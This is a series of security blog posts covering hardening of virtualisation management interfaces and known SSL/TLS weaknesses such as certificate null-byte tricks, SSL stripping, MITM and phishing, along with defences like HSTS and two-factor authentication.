Mitigation techniques for management interfaces

13 11 2014

In VMware’s hardening guide, they offer a number of mitigation techniques that can be used to further secure vCenter from exploitation. The majority of the recommended measures around securing vCenter are of an operational nature rather than reconfiguring settings within VMware. A total of six of the options concerning vCenter alone in the documentation include measures that should be taken in the network to avoid the likelihood of MiTM attacks. Much the same as in my earlier post on hypervisors and throughout my blog, isolating these networks from any user reachable subnet is an advised approach for all management interfaces. If an attacker is unable to directly query the target, they are not able to directly exploit it without exploiting another system or finding a flaw in the software controlling the ACL’s. Although the segmentation approach will thwart the majority of conventional attacks, it is the authors opinion that securing such high target interfaces with usernames and passwords is inadequate and that further authentication processes are necessary.

In an article regarding storage security (Schulz, et al., 2005) commented:

“The strength of any authentication mechanism is based on the quality of the implementation and the strength of credentials. If the credentials are weak, or if authentication data is exposed due to faulty implementation, the mechanism itself can and will be defeated”

While not native to the vSphere product, it is possible to use third party solutions, such as HyTrust (HyTrust, 2012) to require ‘two factor authentication’ for access to the interface. It is also possible to enable two-factor authentication on other admin interfaces such as HP’s iLO. This adopts the defence-in-depth model that is used to ensure that the integrity of a system is not dependent on only one element.

When two-factor authentication is not available, standard network protection measures should be followed that are intransigent with traditional aspects of network security, such as strong passwords and account lockout policies.  It is also advisable to use the method of least privilege when creating the accounts that will have access to the management interfaces, to reduce the result of an attack. All management interfaces have differing levels of customization from the lesser granular options of the Cisco UCS to the highly configurable VMware vCenter. When configuring a user account in VMware’s vCenter, an administrator has the ability to granularly allow/deny individual actions on individual machines that are managed in that environment. An example of the granularity of vCenter’s permissions can be seen in Figure 1. Restricting user’s access to only allow access to the areas of the interface that are needed will reduce the total impact to the environment should a compromise of that account occur.

A small percentage of the options available when configuring permissions in vCenter

A small percentage of the options available when configuring permissions in vCenter

Schulz, G. et al., 2005. Virtualization Journal. [Online] Available at: http://virtualization.sys-con.com/node/48056

HyTrust, 2012. Two factors are better than one. [Online] Available at: http://www.hytrust.com/solutions/security/two-factor

Advertisements




Conclusion on SSL/TLS

17 08 2011

I decided to focus on the SSL and TLS protocols in this blog series rather than any of the other secure communication protocols, as I feel that the secure transportation of browser information is only set for exponential growth, with the pressing requirement of online personal accounts and push of cloud computing, we can all expect to be entering sensitive information online sooner or later.

As you can see SSL and TLS are far from uninfringeable protocols, even after almost 20 years of improvements and revisions, however when compared to other technologies that have been around for that amount of time it has actually proved one of the more robust ones.

Since the protocol was taken over by the Internet Engineering Task Force, flaws such as the redirection attack that was mentioned earlier have often been quickly released. The issue with these flaws is the time it takes venders and administrators to patch their software and sites, leaving users data vulnerable.

In many of the examples that are given around defeating SSL and TLS, it’s not the actual protocols themselves that are allowing this leakage of data. The vulnerabilities that surround these security protocols often have more to do with the worsening certificate ecosystem and user education. This will only worsen unless something is done about growing companies lackadaisical approach to validating users. Due to this slip is validation, the traditional SSL certificate has somewhat been superseded by the Extended Validation (EV) certificate, which is not only more expensive but also requires a set criteria to be followed by the issuer (http://www.cabforum.org/Guidelines_v1_2.pdf) prior to issuing the certificate.

Sites such as Hotmail and Gmail are now starting to become slightly savvier to the SSL and TLS bouncing attacks by starting the user off on encrypted pages to avoid SSL stripping attacks. Also since the release of Firesheep late last year (http://codebutler.github.com/firesheep), a session hijacking tool that prays on users sharing unencrypted Wi-Fi connection, sites such as Facebook and twitter now give users the option to stay ‘HTTPS’ for their entire session (Rice, 2011).

There are always new efforts arising to increase the security of the SSL & TLS protocols. However these will only ever be additional steps that are added to the existing network model, to satisfy this growing need to secure data over a system that was never designed for this kind of traffic. The latest version of TLS, 1.2 however has been designed in such a way that it will most likely be in use for some time to come.





Human Weaknesses in SSL/TLS

11 08 2011

As with any element of computer attacks, often the most effective methods of exploitation come from of non technical attacks that exploit the human element, unfortunately this is no different when talking about SSL/TLS. The ability to trick users into entering their personal information into insecure ‘SSL secured’ pages can be done through a number of ways.

Phishing sites are now being increasingly used to exploit this vulnerability, in research carried out by (Symantec, 2009) they found that due to the trust that users would associate with an SSL connection, hackers were targeting sites with already valid SSL certificates and using them to host a number of different phishing sites, as the browser will show the standard secure padlock or the green bar in the case of Extended Validation (EV) SSL Certificates. As this is intended to indicate security, the user is often unaware that the domain is different from the intended site and will proceed to enter their information. (Symantec, 2009) Also details that:

“From May to June 2009 the total number of fraudulent website URLs using VeriSign SSL certificates represented 26% of all SSL certificate attacks, while the previous six months presented only a single occurrence.”

Another method of using phishing to exploit users, which has also been reported on by (Symantec, 2011), is through misspelled domain names. Attackers can register a number of sites that have variations in the spelling of popular domain names, this way they can legally acquire valid certificates for these sites. The site is then designed to look the same as the real site, from there the attacker will wait for users to mistype a site name or proactively send out bulk emails posing as that real site with links back to their fraudulent web page.

Something that might seem obvious to most user but can also be construe when talking about SSL/TLS is that the protocol itself cannot protect users with weak passwords against brute force or dictionary attacks, as there is nothing in the protocol to specify complexity rules or number off attempts. This responsibility is given to the individual websites.

Although the human factor is inevitably one of the hardest things to ‘patch’, there are some measures being done to combat this issue, by alleviating the user’s ability to click through warnings and error messages.

One standard that has recently been adopted by the IETF is HTTP Strict Transport Security (HSTS). Strict Transport Security is now supported in both Chrome and Firefox version 4 – with a number small number of websites, including Paypal.com offering support for this standard. HSTS works by sending the browser an STS cookie on first logon, which is stored on the device. From this point forward this site specific cookie ensures that all communication between that domain and the client is encrypted with no allowances for any certificates errors or any unencrypted portions of traffic.

In the latest version of the HTTP Strict Transport Security (HSTS) draft (http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-01), it states in section 2.2 the three characteristics of HSTS as being:

• That all insecure connection to a HSTS website should be forced to a secure HTTPS page.

• That any secure connection that is attempted resulting in an error or warning, “including those caused by a site presenting self-signed certificates” will be terminated.

• “UAs transform insecure URI references to a HSTS Host into secure URI references before dereferencing them.”





Certificate weaknesses in SSL/TLS

31 07 2011

A major component that guarantees the authenticity of an SSL/TLS connection within the browser is done through the use of digital certificates. Root certificates are installed and updated independently by each browser vendor. A root cert is a self-signed certificate that can issue certificates to websites once they have proven their identity and ownership of the domain. As shown in Figure 1, Firefox has a number of root certificates installed as default, including the Japanese Government and the Hong Kong Post office.

This means that we, as users inherently trust any sites that are signed by these root authorities. The increase in the amount of root CA’s has resulted in certificates now being much easier to obtain then a number of years ago, with often very little validation being performed before being issue, (Hebbes, 2009) writes:

“the problem is that most Certification Authorities don’t do very much checking. Usually they check your domain name by sending you an email to an address that has the same domain name extension. All this says is that someone who has access to an email address on that domain wants to set up a secure web server. They don’t actually check who you are”

At Defcon 17, (Marlinspike, 2009) gave a talk on defeating SSL security by using a tool that he had developed called SSLSNIFF (http://www.thoughtcrime.org/software/sslsniff/) this tool uses multiple vulnerabilities in the certificate validation process and SSL/TLS implementation found in all the major browsers used today.

In the presentation (Marlinspike, 2009) explains that when completing a certificate signing request (CSR) (which is defined by the PKCS #10 standard) the subject attribute field, which is made up of several other sub attributes, requires the requester to enter the name of the site they wish to request the certificate for. As the SSL certificate process can now be completed purely online and also due to the different ways that strings can be formatted in the ‘commonName’ field according to X.509 (RFC2459), an attacker is able to use the null character string to separate the start of the commonName value from the end.

This way, only the end of the commonName attribute (the domain they own) is checked by the Root CA against the WHOIS database records. This means that they are able to add anything they want into the commonName attribute before the null value – such as http://www.paypal.com. A diagram of this process can be found below.

Armed with this certificate and SSLSNIFF an attacker is able to insert themselves into the middle of communication and act as Paypal.com – with what looks like a completely valid certificate. (Marlinspike, 2009) explains that this attack is possible not only in web browsers such as; Firefox, IE and Chrome, but also in mail clients like Thunderbird and Outlook and even SSL VPN solutions such as Citrix.

Finally (Marlinspike, 2009) demonstrated an attack base around the Network Security Services (NSS) libraries, which are implemented in Firefox and Chrome where an attacker is able to use the certificate wildcard function to gain a universal wildcard certificate using *.domain.com, which effectively gives an attacker a valid digital certificate for any website they wish.





Technical Implementation Attacks on SSL/TLS

11 07 2011

As shown in the introduction, since the original release of SSL 1.0 there have been a number of amendments required due to vulnerabilities found in the implementation or the protocol. While the latest version of the TLS protocol (1.2) currently appears to be fairly robust against external attacks – with the introduction of the SHA256 cipher suites, not all secure communication today takes advantage of this standard. As shown in Figure 1 – which is a screenshot taken of the supported transport protocols within Firefox 3.6.15, this shows that the Mozilla developers are yet to adopt the latest two versions of TLS, leaving users open to weakened ciphers and other vulnerabilities that have been addressed in newer versions.

The majority of attacks on SSL and TLS that occur are from within the same LAN, in the form of Man-in-the-middle attacks (MITM). These attacks work by an attacker placing themselves in-between the client and the server; this is done by using the address resolution protocol (ARP) to spoof the whereabouts of MAC addresses on the network. This works at layer 2 of the OSI model and is how machines communicate on all Ethernet LANs, this attack is explained in Appendix 1. In a white paper written by (Burkholder, 2002) he writes about how it was:

“In late 2000 security researcher Dug Song published an implementation of an SSL/TLS protocol MITM attack as part of his ‘dsniff’ package.”

Due to the processing overhead associated with the asymmetric algorithms that SSL/TLS use, sites have often only used these protocols where it is needed. It is not unusual for the majority of websites that actually use SSL to protect user’s information, to have them filled out their sensitive information on an unencrypted page first, before ‘bouncing’ the data through an SSL/TLS encrypted tunnel. This method of securing data is adequate against attackers that are not proactively sniffing network communications. However when using a tool like SSLStrip, as described by creator (Marlinspike, 2009) you are able to add yourself in as a bridge between the two lines of communication. As most users either encounter SSL/TLS through either a 302 redirection request, directing them from a HTTP page to a HTTPS page or in the way that shopping sites bounce you to HTTPS pages. This software intercepts the users request for the HTTPS page and strips the ‘S’ out of the request. It will do this so that all communication that takes place is over a non encrypted HTTP protocol. The software keeps track of changes it makes by adding each action it performs into a internal mapping buffer. The attacker is then able to sniff the information being sent in clear text.

The only way this attack can be spotted by a user is by checking that the address bar is showing HTTPS instead of HTTP and that the SSL padlock is also shown (location is dependent on individual browser), although there are ways to change the address icon from, say the Google logo to a padlock in transit.

Early in November 2009, in an article released by (Ray & Dispensa, 2009) information was disclosed of a flaw in the renegotiation portion of the TLS /SSL protocol. This attack affected all versions of TLS and also version 3 of SSL. Although this issue has now been patched by most individual vendors SSL/TLS implementations, an article written by (Pettersen, 2010) reports on research that suggests one year after the public disclosure of the flaw, only 37.3% of all SSL/TLS servers have been patched against the issue.